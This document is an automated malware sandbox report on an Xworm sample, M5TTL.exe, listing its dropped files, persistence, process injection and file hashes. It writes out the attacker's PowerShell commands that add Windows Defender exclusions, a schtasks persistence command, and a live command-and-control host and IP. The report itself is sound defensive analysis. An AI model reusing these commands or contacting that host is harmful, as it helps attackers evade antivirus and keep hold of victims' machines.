Analysis Overview
SHA256
4ec3fbfb426c8f24e10b05f3410f002520161f61c0d6ee0973ddc4ccf5e023be
Threat Level: Known bad
The file M5TTL.exe was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Detect Xworm Payload
Xworm
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Adds Run key to start application
Drops file in System32 directory
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-14 23:17
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-14 23:17
Reported
2024-06-14 23:18
Platform
win10-20240404-en
Max time kernel
18s
Max time network
18s
Command Line
Signatures
Detect Xworm Payload
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4280 created 584 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xworm
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\x4RunTime x4Broker.exe | N/A |
| N/A | N/A | C:\Windows\System32\x4Shellcode.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" | C:\Windows\System32\x4RunTime x4Broker.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| File created | C:\Windows\System32\x4RunTime x4Broker.exe | C:\Users\Admin\AppData\Local\Temp\M5TTL.exe | N/A |
| File created | C:\Windows\System32\x4Shellcode.exe | C:\Users\Admin\AppData\Local\Temp\M5TTL.exe | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\System32\Tasks\svchost | c:\windows\system32\svchost.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4280 set thread context of 4384 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
c:\windows\system32\sihost.exe
sihost.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Users\Admin\AppData\Local\Temp\M5TTL.exe
"C:\Users\Admin\AppData\Local\Temp\M5TTL.exe"
C:\Windows\System32\x4RunTime x4Broker.exe
"C:\Windows\System32\x4RunTime x4Broker.exe"
C:\Windows\System32\x4Shellcode.exe
"C:\Windows\System32\x4Shellcode.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{40d7ebd2-92ce-47f2-a45b-309d21c905f3}
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\x4RunTime x4Broker.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x4RunTime x4Broker.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
C:\Users\Admin\AppData\Roaming\svchost.exe
C:\Users\Admin\AppData\Roaming\svchost.exe
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | edition-eat.gl.at.ply.gg | udp |
| US | 147.185.221.19:13576 | edition-eat.gl.at.ply.gg | tcp |
Files
C:\Windows\System32\x4RunTime x4Broker.exe
| Algorithm | Digest |
| --- | --- |
| MD5 | c769af1ba52c8291a527f29bc06b3655 |
| SHA1 | 3f19a69c66b5014d6aef6fb52977d94503eac1e8 |
| SHA256 | 3bfc9c08fc80a764bf23c48f8d546191415901cf4023a2bfc247d3814cdc4eb1 |
| SHA512 | c7000c5b23e1e28b9eb63c822dd8908418292415120e195c6332c7b90809560173e0fc07fa9783e08a97e3ca392154491a5c16d97b949ac9a6e7bf2041099eb7 |
C:\Windows\System32\x4Shellcode.exe
| Algorithm | Digest |
| --- | --- |
| MD5 | 8a7bee2c8cec6ac50bc42fe03d3231e6 |
| SHA1 | ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d |
| SHA256 | c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8 |
| SHA512 | 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5 |
C:\Windows\Temp\__PSScriptPolicyTest_kn54ziuv.b4d.ps1
| Algorithm | Digest |
| --- | --- |
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| Algorithm | Digest |
| --- | --- |
| MD5 | 8592ba100a78835a6b94d5949e13dfc1 |
| SHA1 | 63e901200ab9a57c7dd4c078d7f75dcd3b357020 |
| SHA256 | fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c |
| SHA512 | 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Algorithm | Digest |
| --- | --- |
| MD5 | 502fb5d3e73cc242e45bcc213facf317 |
| SHA1 | 044fe43dcc8327a481284f777041abd084c5690a |
| SHA256 | ad548c765f7737682e4d6a93f0d347722b3765e2b5ae4df6483428a48de56fec |
| SHA512 | ec5efcc5df243bc74f97ad27fc7300562217a13da0b718a74d140a73db5cf9e3702c52e8861c9cfaf453cc7e8705be61782cef0b644d98679fd4d7bc1d51e7d0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Algorithm | Digest |
| --- | --- |
| MD5 | d4c2854e165c109cde7e28fa9832f2e3 |
| SHA1 | 459d20474766c56264b37050d49b33771f74ef1e |
| SHA256 | 1f4c0110c5ac7d7081ba6803c75b3b60fde28193a955003e171c45f791c23b26 |
| SHA512 | 4fc5cb3d952f48c822f0a4a0f6ca41fe1344aab1529c2af35895e4b137d27ea2b0f92638333bb53487e181ac587a261d7d1d348b2146b6c7c8bde193685d08de |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| Algorithm | Digest |
| --- | --- |
| MD5 | 2f15a817a9b28dd0ba88c67ff3d4dd3d |
| SHA1 | 0adc04e7418bf1fe171fe4722fddd9de872127e1 |
| SHA256 | 412a72f004275f9e4c5c287f9300d2d9983e9d3f3edde3756dc82b3bc16df01d |
| SHA512 | 9d4674d5c2109889e4592193410a37ebd924ec661d6319c41336f282c355377b74535b8d287aaef6e107b69156268fd5b147a6e9e4160c6404b3e4b00cfe68f9 |